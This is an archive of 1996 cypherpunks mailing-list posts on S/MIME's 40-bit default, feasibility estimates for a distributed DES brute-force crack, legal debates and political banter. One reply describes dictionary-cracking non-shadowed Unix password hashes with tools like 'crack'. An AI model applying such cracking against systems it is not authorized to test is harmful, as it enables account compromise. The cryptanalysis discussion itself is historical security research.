> > What will Netscape do to about the 40bit RC-2 default and the signatures on
> > the outside of the encryption envelope design flaws in S/MIME? I can't
> > imagine Netscape releasing software that has these two properties.
> 
>   If you know that the recipient can read a message encrypted with
> 3DES, IDEA, or RC2-128, then you can send the message using one of
> these strong algorithms.  Given that you need someones public key
> to send them a message, there are several obvious ways to transmit
> information about what algorithms they accept along with it.

   Yes, we all know that. But which one will Netscape actually _do_?

   If there's one thing we've learned from PGP, it's that configuration 
and per-user key management are killers. The reason why I'm so excited 
about Netscape is that you guys have the _possibility_ to really get 
strong crypto to the masses. Whether you really do that or not is in 
your hands.

   I've made a proposal for solving the 40-bit protocol failure in 
S/MIME. There are other proposals out there too, with various strengths 
and weaknesses. The main advantage of mine is that it requires no 
additional infrastructure - i.e. VeriSign does not have to start 
including algorithm preferences in the DigitalID's they distribute.

   Will Netscape come through?

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 24 Jul 1996 01:31:41 +0800
To: cypherpunks@toad.com
Subject: Re: Decrypt Unix Password File
In-Reply-To: <01BB78C7.358738E0@ip73.i-manila.com.ph>
Message-ID: <9HRiRD9w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jerome Tan <jti@i-manila.com.ph> writes:

> How can I decrypt Unix password file?

If the /etc/passwd file does not use shadow passwords, then the second field
of each line contains the 'salt' and a value dependent on both the salt and
the secret password.

One can try to compute the function of all reasonable dictionary words with
the salts in the /etc/passwd file, and hope that some of them match the
values listed in the file.

There are many programs that do this, e.g., look for 'crack'.

This attack can be made more difficult if you force your users not to use
easy-to-guess passwords, and if you use something like NIS and shadowing to
make the public part of the passwords harder to get.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sparks@bah.com (Charley Sparks)
Date: Wed, 24 Jul 1996 21:55:49 +0800
To: cypherpunks@toad.com
Subject: When books are outlawed
Message-ID: <v02140b05ae1a766f95d7@[156.80.2.155]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Only outlaws will have books...

Just watching the news here in Fl. and they are trying to hold a publisher
responsible for a murder because they published a fictional account of a
hitman and a guy says he used the book to kill some people.

Would you give your 6 year old a book ?

This is really getting out of hand.. Anyone have any property for sale in
Idaho ?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCXAwUBMfTGneJ+JZd/Y4yVAQHLuQQMDQglhj5/SWlstlnGTnky47xkqIrm5gUK
umCeV7tdlKlYjy/KprUx/UChy2GQ/fHd6rh14CIrnqIzV8I1WUOIbcLWYsOZxTmU
sOa2vwISXuLvV7wDy50GgLq3kjGUh+BvhvAfxD/vrbyjOWYMCJB9KNRqE2TMpSn5
O6J/Pb0OYkQB6A==
=A8SX
-----END PGP SIGNATURE-----

                      Charles E. Sparks
         http://www.clark.net/pub/charley/index.htm
           In God we trust, All Others we encrypt
   Public Key at:  http://www.clark.net/pub/charley/cp_1.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Thomlinson <mattt@microsoft.com>
Date: Wed, 24 Jul 1996 04:24:35 +0800
To: "'trei@process.com>
Subject: RE: Brute Force DES
Message-ID: <c=US%a=_%p=msft%l=RED-77-MSG-960723153957Z-593@tide19.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


why not put together (a LOT of) disk space and we can build a table
(read: "a cryptanalytic time-memory tradeoff") for cracking DES? Using
the table, we could brute-search the DES keyspace in less time than it
would take to do an exhaustive search of a 38 bit keyspace, according to
the paper. 4 gigs is what, a couple of hundred nowadays?

Making DES equivalent to a 40-bit crack would take approx. 500Gig, but
publishing the table would push DES out usefulness. Certainly we could
scale back (make DES equivalent to a 45-bit crack?) if we don't have
enough disk...

mattt

>----------
>From: 	Peter Trei[SMTP:trei@process.com]
>Sent: 	Monday, July 22, 1996 9:55 AM
>To: 	frissell@panix.com; cypherpunks@toad.com; trei@process.com
>Subject: 	Re: Brute Force DES
>
>> Peter wrote:
>> >Any one up for a distributed brute force attack on single DES? My 
>> >back-of-the-envelope calculations and guesstimates put this on the
>> >hairy edge of doability (the critical factor is how many machines can
>> >be recruited - a non-trivial cash prize would help). 
>
>Duncan wrote: 
>> I volunteer my 120 MHZ Pentium.  A lot more Pentiums are out there now than
>> a year ago.  That makes it more feasible.  A lot more people with full net
>> connections.  Like most Americans, I have a flat rate net connection and a
>> flat rate local phone connection so could run a cracking session
>>permanently
>> (as long as no one tells my ISP).  We need a full test of the Winsock
>> cracking client in any case.  It wasn't working very well last time.
>> 
>> DCF
>
><back-of-envelope>
>
>In my terminology, 'hairy edge of doability" means we have a shot
>at success, but I wouldn't bet the farm on it.
>
>I thought that I might bet a couple hundred bucks, though.
>
>Sadly, after further calculation, I'm not so sure if it's doable just yet.
>
>What I'm looking at is a known plaintext attack on single ECB DES, 
>using a brute-force test to cycle through the key space. People 
>would get chunks of keyspace to test from a central server or 
>servers, and would be motivated to take part by a cash prize for
>the lucky person who finds the key.
>
>Lets do  the numbers:
>
>Single DES has the security of 56 bits of key - there are 64 bits in the
>keys, but 8 of them are parity bits which add nothing to security.
>
>2^56  = 7.205e16 keys (which is a whopping big number)
>
>Let's guess that we can recruit the equivalent of full-time on 1000
>machines.
>
>7.205e13 keys/machine.
>
>Let's guess that we have about a month before people start to lose 
>interest - so we want to be more than 1/2 done by then. Lets say
>we want to sweep the whole space in 40 days.
>
>1.8e12 keys/machine/day 
>
>~21,000,000 keys/machine/second
>
>The fastest general purpose, freely available des implementation I'm
>aware of is libdes. by Eric Young. With this, I can do a set_key in 
>15.8 us, and an ecb_encrypt in 95 us/block. That adds up to 
>about 9,000 keytests/sec (this is on a 90 MHz P5, running NT).
>
>I'm looking at ideas to speed up DES - if I'm willing to use
>honking great lookup tables, the permutation steps  can be done 
>more quickly than libdes. I'm also looking at implementing the
>algolrithm in hand-optimized P5 assembler.  (It's been years since
>I've done a major assembler project - the P5 has some truely weird
>features to be considered, but also has (some) internal 64 bit
>registers to play with).
>
>Let's guess that I can speed up a key-test up by a factor of 10. (This is
>not a slur on Eric's code - it's extremely clever, but not optimized
>for any particular processor, or for key-testing.  Note that the keytest 
>described above takes about 10,000 cycles/test.)
>
>That gets my workstation up to about 90,000 keys a second, which is
>still almost a factor of 250 too slow. 
>
>I'm going ahead with my work on a faster DES keytester, but unless
>optimizing gives an astounding win, I now think a distributed bruting 
>effort is a bit pre-mature.
>
>What will make this brute doable, if not now, then in the near future?
>
>1. Faster Processors - Moore's Law is still holding. A year ago, my
>90 MHz Pentium was one of the faster machines taking part in the
>40-bit RC4 crack. Now, it's passe.
>
>2. More processors. The number of people on the internet continues
>to grow rapidly.
>
>3. More interest - Crypto awareness has greatly increased in the
>last year, and a real cash prize (say, over $500) will generate both
>publicity and interest.
>
>These factors all multiply together. The number of cycles that could
>probably be recruited is increasing at a fast rate. A major part of the
>work will be a keyspace distribution mechanism which can handle
>the load (this was a major stumbling block last year). 
>
></back-of-envelope>
>
>Peter Trei
>trei@process.com
>
>Disclaimer: This has nothing to do with my employer.
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 24 Jul 1996 00:46:02 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: DES-Busting Screen Savers?
In-Reply-To: <ae19b70d1702100474bf@[205.199.118.202]>
Message-ID: <199607231346.IAA26649@homeport.org>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:

| >As far as cash prizes go how much could cypherpunks and friends
| >generate for such a purpose?  I'd guess individuals could come up with
| >a fair bit of money... 1000+ list members x 10$ = 10k (or whatever).
| 
| More realistically, 1000+ list members x 10% who make plans to contribute x
| half of these who actually follow through x $10 = $500. (If that....)
| 
| Prizes have their place, but are hard to set up properly.

	A better way to set up a prize is to find a few big companies
willing to sponsor such a demonstration.  AT&T, Nortel, RSA, Netscape,
Microsoft, Qualcomm, and many other companies have an interest in
seeing stronger than DES crypto exportable.  Perhaps one of them could
set up a prize, similar to netscape's Bugs Bounty, or the RSA-129
challenge.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 24 Jul 1996 02:03:58 +0800
To: cypherpunks@toad.com
Subject: RE: Boobytraps and the American Legal System [France Legal System]
In-Reply-To: <01BB7893.31CF1080@JPKroepsli.S-IP.EUnet.fr>
Message-ID: <HTsiRD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jean-Paul Kroepfli <JeanPaul.Kroepfli@ns.fnet.fr> writes:
>
> Not only, in France too. Circa twenty years ago a man booby-trapped his =
> secondary house (a radio set with explosive) and was successfully sued =
> by the burglar for damages.
> I think it is also the point of view of the central european society.

mantraps are perfectly legal under english common law (a person's home is
his or her castle) but not under the fascist american common law.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Wed, 24 Jul 1996 09:29:52 +0800
To: tomw@netscape.com>
Subject: Re: Netscape
In-Reply-To: <v02120d1cae19ff45e1b0@[192.0.2.1]>
Message-ID: <v03007801ae1aaab8f5fc@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:15 PM -0700 7/22/96, Lucky Green wrote:

>Remember, even PRZ was only harassed, never charged.

Phil Z was not harassed, he was investigated.

When the government harasses you, believe me you will know it. Can you say
"IRS"?

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Wed, 24 Jul 1996 20:54:37 +0800
To: cypherpunks@toad.com
Subject: Re: Preaching to the Choir?
In-Reply-To: <ae1999321502100470ef@[205.199.118.202]>
Message-ID: <v03007802ae1aab942a1f@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:42 PM -0700 7/23/96, Timothy C. May wrote:

>What _does_ happen is that people who have not given a lot of thought to
>some issues get exposed to views and can decide for themselves. Many
>student types arrive on this list with various half-baked ideas about the
>role of government, the effectiveness of laws, etc.
>
>_These_ folks are often influenced by persuasive points made here--they
>usually recognize the "common sense" in the best arguments presented. (At
>least this is what folks have told me, that they came to the list having
>ideas that crypto-privacy was important, but not realizing the full
>ramifications of the libertarian outlook until exposed to many people
>discussing them here.)
>
>So, I don't expect to convert David Sternlight to my views, nor to convert
>Phill H.-B. Nor do they, I am sure, expect to convert me. But I _do_ hope
>that the arguments here will have an effect on the thinking of many.

Tim has it exactly right. And those who call names or try to suppress views
different than their own are simply acknowledging publicly that their views
are pretty weak, if not simple prejudice.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 24 Jul 1996 20:47:37 +0800
To: jsw@netscape.com
Subject: Re: Netscape
Message-ID: <v02120d21ae1aa90b967e@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:23 7/23/96, Jeff Weinstein wrote:

>  If you know that the recipient can read a message encrypted with
>3DES, IDEA, or RC2-128, then you can send the message using one of
>these strong algorithms.  Given that you need someones public key
>to send them a message, there are several obvious ways to transmit
>information about what algorithms they accept along with it.

Granted. What about the signature bug? Will Netscape encrypt the outside
signature?



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 24 Jul 1996 19:42:57 +0800
To: W Lee Nussbaum <wln@evolution.com>
Subject: Re: Intel, Microsoft doing Internet Phone Software
Message-ID: <199607231622.JAA04071@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:47 AM 7/23/96 -0400, W Lee Nussbaum wrote:
>
>
>On Mon, 22 Jul 1996, jim bell wrote:
>
>> If these people REALLY wanted to promote the use of Internet telephoning, 
>> what they'd do is implement a system where an Internet ISP could be "called" 
>> over the Internet by a person wanting to place an LD telephone call to that 
>> area, and (presumably using A/D and D/A techniques) rather than generating 
>> and receiving modem tones, woudl generate and transmit the audio over the 
>> telephone line.  That way, the target of the call would simply need to pick 
>> up the telephone and talk, as he would ordinarily do:  He wouldn't even need 
>> a computer.  He might not even know the call was going over the Internet.  
>
>...see IDT's Net2Phone product, at http://www.net2phone.com/; it does 
>what you describe.  Two notes: (1) I haven't used it yet; (2: disclosure) 
>I'm now employed by IDT, though in a different area.

Excellent!  It seems that the one remaining piece in the puzzle is financial 
motivation.  Many ISP's might hesitate to install a "feature" on their 
systems which has the prospect of tying up some of their lines, with no 
payback.  As much as it pains me to face it, at this point what is needed is 
some system to pay the ISP's for maintaining and even upgrading their 
systems to make this whole thing practical.  

Currently, Sprint is proud to announce that they charge 10 cents a minute 
for off-peak calls.  Could an ISP make money charging, say, 2 cents a minute 
for a similar service?  The main marginal cost is that of an extra phone 
line, which is probably about $30 per month or $1 per day.  Assuming the 
line is occupied 8 hours per day, that's 480 minutes, which means that the 
phone line costs 0.2 cents per minute.  Even if other costs increase this by 
a factor of 5 or so, there should be nothing to prevent an ISP from making 
money off a 2 cent per minute charge or even less.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 24 Jul 1996 20:51:25 +0800
To: Rabid Wombat <harka@nycmetro.com
Subject: Re: Bare fibers
Message-ID: <199607231622.JAA04074@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:20 AM 7/23/96 -0400, Rabid Wombat wrote:
>
>> 
>> Doesn't that make it vulnerable (detectable) to Tempest attacks?

>No.
>Transmitting light via fiber doesn't emit EM.
>Anyway, the original post, as I recall, was about keeping sensitive data 
>on a second hard drive, connected via (very thin, therefore harder to 
>notice) fiber. Tempest monitoring was not a factor.


It occurs to me that a bare fiber could actually be (randomly) hung across 
treetops, roofs, power lines, and various other structures, over a 
many-block distance in suburban areas.    Such a fiber wouldn't be protected 
very well, but it would probably last a few months.  It would also be 
exceedingly hard to find its terminations, and tracing it would be a real 
pain.  (It probably wouldn't be visible against a bright sky more than a 
meter or two away.)

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 24 Jul 1996 17:34:35 +0800
To: Matt Blaze <mab@crypto.com>
Subject: Re: Distributed DES crack
In-Reply-To: <199607230422.AAA09435@crypto.com>
Message-ID: <199607231331.JAA15803@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Matt Blaze writes:
> I don't want to throw water over what I think would be a very useful
> thing to have done, but I'm really skeptical that current "net"
> computing power with general purpose processors is up to this.

I think it is a stretch, admittedly, but that it can be done, and most
importantly, it can be done nearly for "free".

> My back of the envelope calculation, making some generous assumptions
> about the implementation, suggests that such an effort would require
> somewhere in the range of 10,000 and 50,000 CPU years on general (100MHz
> or so Pentium) processors.  This is well beyond any distributed computation
> I'm aware of ever having been done, even adjusting for "Moore inflation".
> While feasible in a "complexity theory" sense, it's really not realistic
> yet.

I'm not entirely sure. It is certainly bigger than the factorings that
have been done, but on the other hand it is fairly easy to put
together the experiment, and there are an awful lot of idle machines
out there in the world. I have on several occassions been in
possession of four or five hundred idle CPUs at night, and I am pretty
sure that other people are in that position. The net has also grown
quite dramatically in recent years, and reaching 100,000 reasonably
high speed machines might not be so hard these days. At that point, it
becomes a question of how fast one can get the DES cracker. A constant
factor of two or three then makes a considerable difference in the
outcome, as does the user friendlyness of the overall system.

> Personally, I'd rather someone finish up the Wiener ASIC to the point where
> it could go out to fab, get some prototype chips made, design a board around
> it, and publish the design, from board layout on down.  This would be a
> great Master's project, and some of us (maybe me, but I'll have to check)
> might even be able to scrape up enough funds to buy enough chips/boards/etc
> to build a modest size machine (say, that could exhaust a DES key in 1-6
> months).  Initial engineering costs aside, the marginal cost of each
> such machine could be well within the budgets of, say, a medium size crypto
> research lab, and would make a scary enough demo to convince even the
> most trusting management types of the risks of 56 bit keys.

Well, that would certainly be cool, but this does require real
money. If you are willing to spend it, go for it, but I'm not sure we
can count on people doing that sort of thing. What do you suppose the
odds are that someone is going to build such a thing any time soon?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Wed, 24 Jul 1996 21:00:41 +0800
To: cypherpunks@toad.com
Subject: Re: NOISE: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <Pine.SV4.3.91.960722184508.11943H-100000@larry.infi.net>
Message-ID: <v03007804ae1aad9fa49d@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:49 PM -0700 7/22/96, hallam@Etna.ai.mit.edu wrote:
>
>>   Well, you're in a country of _free citizens_ now, Limey, so if you
>>don't like it, then go back to England - a whole nation of people who foam at
>>the mouth with pride and pleasure over their status as feudal _subjects_.
>
>O.K. lets see if we brits were to offer you yankees the Windsors,
>plus an assortment of flunkies, corgies and stuff are you so sure that
>your people would reject it? After all someone sold you a bridge so
>it's not that implausible.

Some of us love the occasional rabbit's foot but we don't carry the live
rabbit around with us. Maybe if you offered us Charles' Rolls Royce, or the
odd Crown Jewel...

>
>Given the way your press goes nuts over big ears and his ex wife
>(aka familly brood unit) it is clear that you would jump at the
>chance if the price was sufficiently high (i.e. is the Brits asked
>for enough money).
>
>>Dja ever notice that Charlie Mountbatten married a gorgeous young babe,
>>but was irretrievably drawn to to an elderly woman of great ugliness?
>
>>No, Phil, do NOT ask me to call him Prince.   I'd sooner follow the
>>example of Lady Liberty in the Seal of the Commonwealth of Virginia.

If you won't call him "Prince", how about "Rover"? (pun intended)

>
>Actually Lord Mountbatten was not a prince of the UK, he was a prince
>of the Greek royal family and his name was not Charles. The Prince
>of Wales is Charles Windsor an he comes from a distinguished line of
>Germans.

And judging from recent exposes, Wallis Simpson's Duke of Windsor was
trying very hard to get back to the mother country and his kindly old Uncle
Adolph.

How's THIS thread for off-topic? The first reader who fails to be amused is
given one free pass to tell both Phill and I to take it to e-mail.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 24 Jul 1996 20:01:08 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Distributed DES crack
In-Reply-To: <199607222314.TAA12858@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.960723093316.28197A@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 22 Jul 1996, Perry E. Metzger wrote:

> Ben Holiday writes:
> > I've a few machines around that could be dedicated almost full time to the
> > task. What are the bandwidth requirements?
> 
> Probably near zero. People can get sections of the search space
> parceled out to them.

I've always wondered whether chinese lotterys could be made more reliable by 
having each player check random keys rather than searching within a 
block. That way it becomes a lot harder to spoof by volunteering for a 
block and reporting incorrect results. 

 ---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 24 Jul 1996 02:00:29 +0800
To: trei@process.com
Subject: Re: Brute Force DES
In-Reply-To: <199607222043.NAA06313@toad.com>
Message-ID: <199607231338.JAA15819@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Peter Trei" writes:
> The fastest general purpose, freely available des implementation I'm
> aware of is libdes. by Eric Young. With this, I can do a set_key in 
> 15.8 us, and an ecb_encrypt in 95 us/block. That adds up to 
> about 9,000 keytests/sec (this is on a 90 MHz P5, running NT).

I'll point out that like most DES implementations, Eric's tries to
spend a lot of time in key setup to save time later on in
encryption/decryption. This tradeoff would probably be very different
if you didn't plan on trying more than one or two blocks of decryption
after getting a key.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Wed, 24 Jul 1996 04:35:34 +0800
To: Ernest Hua <hua@chromatic.com>
Subject: Re: [Noise] was Re: Giving 6 year old kids Uzi's
In-Reply-To: <v0300760dae16b3606e8b@[192.187.162.15]>
Message-ID: <v03007805ae1aafae20ad@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:14 PM -0700 7/22/96, Ernest Hua wrote:
>> >Rural America has a very different culture than urban America and urban
>> >America's recent attempts to impose its values (like hoplophobia) on us
>> >really chafes.
>>
>> Though it is well known that I am in favor of gun control regulations, I
>> have to support Brad Dolan here. There is a huge and traditional gun
>> culture in rural American, particularly in the midwest. The way most Jewish
>
>Or the way many blacks were lynched (physically and socially) in the South.
>Or the way many asians were segregated.  Or the way many ethnic groups
>fought each other in inner cities.
>
>These are cultural relics of the good ol' days I simply can do without.
>
>Ern

I find myself in the very peculiar and unfamiliar position of defending the
gun crowd--I fail to see how (speaking generally) a midwestern rural teen's
having a hunting rifle affects someone in urban America.

Any integrity with respect to civil liberties extends to the rights of
those with whom you disagree. Otherwise it's self-indulgence wrapped in
fancy-looking clothes.

David







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Wed, 24 Jul 1996 10:50:17 +0800
To: Matt Blaze <mab@crypto.com>
Subject: Re: Distributed DES crack
In-Reply-To: <199607230422.AAA09435@crypto.com>
Message-ID: <Pine.SCO.3.93.960723093328.11859A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Jul 1996, Matt Blaze wrote:

<snip>
> 
> Personally, I'd rather someone finish up the Wiener ASIC to the point where
> it could go out to fab, get some prototype chips made, design a board around
> it, and publish the design, from board layout on down.  This would be a
> great Master's project, and some of us (maybe me, but I'll have to check)
> might even be able to scrape up enough funds to buy enough chips/boards/etc
> to build a modest size machine (say, that could exhaust a DES key in 1-6
> months).  Initial engineering costs aside, the marginal cost of each
> such machine could be well within the budgets of, say, a medium size crypto
> research lab, and would make a scary enough demo to convince even the
> most trusting management types of the risks of 56 bit keys.
> alerts me to an interesting topic.  Thanks.)

Matt, can you give us an idea of the cost of a "modest size machine" might
be?  Is this something we can do with a C'punks bake sale or our we going
to need corporate/academic support?  Also, if we do use the bake sale
approach, is there some way the money can be collected and routed into an
R&D sort of facility without causing a lot of stink with whomever actually
runs the place, like a university?

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|protects - District Judge Stewart Dalzell|                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jean-Paul Kroepfli <JeanPaul.Kroepfli@ns.fnet.fr>
Date: Tue, 23 Jul 1996 23:35:01 +0800
To: "'Timothy C. May'" <tcmay@got.net>
Subject: RE: Boobytraps and the American Legal System [France Legal System]
Message-ID: <01BB7893.31CF1080@JPKroepsli.S-IP.EUnet.fr>
MIME-Version: 1.0
Content-Type: text/plain



TCM wrote:
(...)
>Still, I remember vividly in college when the court case was decided
>involving a guy in Florida who was tired of being burglarized and the cops
>doing nothing about it: he rigged a shotgun to go off when someone broke a
>window and entered. A perp did, was shot, survived, and the case went to
>trial.
>
>The boobytrapper was found guilty of some serious crime--I don't recall the
>details (this was circa 1972).
>
(...)
>
>As Vinnie said, "only in Amerika."

Not only, in France too. Circa twenty years ago a man booby-trapped his secondary house (a radio set with explosive) and was successfully sued by the burglar for damages.
I think it is also the point of view of the central european society.

Jean-Paul
~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
Jean-Paul et Micheline Kroepfli      (our son: Nicolas and daughter: Celine)
eMail: JeanPaul.Kroepfli@utopia.fnet.fr    Also Compuserve and MSNetwork
Phone: +33  81 55 52 59  (F)          PostMail: F-25640 Breconchaux (France)
   or: +41  21 843 27 36 (CH)               or: CP 138, CH-1337 Vallorbe
  Fax: +33  81 55 52 62                                        (Switzerland)
Zephyr(r) : InterNet Communication and Commerce, Security and Cryptography consulting
PGP Fingerprint : 19 FB 67 EA 20 70 53 89  AF B2 5C 7F 02 1F CA 8F
"The InterNet is the most open standard since air for breathing"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Wed, 24 Jul 1996 01:46:11 +0800
To: cypherpunks@toad.com
Subject: RE: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <9606238381.AA838140676@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain



perry@piermont.com writes:
>Jefferson could have been a mass murderer for all I care. His words
>may be evaluated fully independently of his actions. They are not
>interdependent.

Many of our current politicians would be heartened by your sentiment:
        Do as I say, not as I do.

Personally, I incline more towards the other cliche: 
        Actions speak louder than words.

It is possible to evaluate a persons words independent of their actions, but,
given that environment has some effect on behaviour, it is not at all clear that
you can treat them as independent. Nor, more importantly, would you want to. It
could prove to be a good breeding ground for cynicism. Or is it sarcasm... ;-)

James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Wed, 24 Jul 1996 00:28:16 +0800
To: "'Ben Holiday'" <ncognito@gate.net>
Subject: RE: Distributed DES crack
Message-ID: <01BB787C.91653EF0@mirage.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On 22 July 1996 22:48, Ben Holiday[SMTP:ncognito@gate.net] wrote:

> I've a few machines around that could be dedicated almost full time to the
> task. What are the bandwidth requirements? Specifically, could the
> keycracker be run over a 28.8 (with a 486 running linux)?  If so, how many
> 486's could I get over a single 28.8 (i.e. 28.8 -> multiple 486's daisy
> chained with ppp over direct serial connection)?

It's not a factor of the bandwidth, you search offline and send in your
results to a central server.

But first, a little reality check is in order.  According to libdes,
the 200Mhz Pentium Pro on my desk will do 1,827,997 ECB bytes/sec, or
228,499 ECB blocks.  A DES crack would have to try, on average, 2^55
blocks.  That would take my machine 43,798,875 hours, or 1,824,953 days.

OK, so let's be reasonable and say that a week would be a good time to
come up with a DES key.  We would need 260,707 200Mhz Pentium Pro's to
achieve this.

Looking at that, 30 days seems not such an unreasonable target.  We would
need 60,831 200Mhz Pentium Pro's to achieve this.

It seems obvious to me that DES is still *way* out of reach of anything
other than special purpose hardware.


Regards,

- Andy (hoping he got his sums right)


PS. For those more acquainted with Sun hardware, an Ultra-1 will do
    1,683,647 ECB bytes/sec (gcc 2.7.2).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 24 Jul 1996 21:02:18 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: [Noise] Re: <rant> Re: Devil's Bargain
In-Reply-To: <Pine.LNX.3.94.960723062550.641C-100000@switch.sp.org>
Message-ID: <Pine.LNX.3.93.960723094813.102A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Jul 1996, The Deviant wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> On Mon, 22 Jul 1996, snow wrote:
> > Date: Mon, 22 Jul 1996 11:50:39 -0500 (CDT)
> > From: snow <snow@smoke.suba.com>
> > To: Alex Derbes <acd@artemis.arc.nasa.gov>
> > Cc: Roger Williams <roger@coelacanth.com>, cypherpunks@toad.com
> > Subject: Re: [Noise] Re: <rant> Re: Devil's Bargain
> > On Mon, 22 Jul 1996, Alex Derbes wrote:
> > > 	There were no signs of mecahnical faliure, the plane took off one 
> > > hour late, that means if it was a timed bomb the plane would have gone 
> > > down over oh lets say random VERY VERY deep place in the atlantic ocean.  
> > > The plane was an easy shop for all sorts of shoulder launched SAM's.  
> >      According to the information I have seen, there are no SAM's that can
> > reach out and touch a plane at 13000 feet. The engagement ceiling on a
> > most is 8000 to 9000 feet iirc.
> 
> Ummm... Stinger missles go ~5 miles.  13000 is about 2.7 miles.  
 
    They have a 5 mile horizontal reach, their vertical engagement ceiling 
is about 8000 to 9000 feet. 

> > > There is a hell of alot of terrorist activity right now, and the 
> > > olympics, I think there is good circumstantial evidance to suggest 
> > > terrorist activty just from motives and oppertunity.
> >      What motives?
> There was a threat the day beforehand and all...

     I don't know if it was terrorist activity, I was just annoyed at 
the extensive every 15 minutes even tho' there is nothing new to say I 
gotta get my mug and my voice on the ether coverage. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Wed, 24 Jul 1996 05:02:57 +0800
To: Ted Anderson <tomw@netscape.com>
Subject: Re: Netscape
In-Reply-To: <v02120d04ae1763d7df01@[192.0.2.1]>
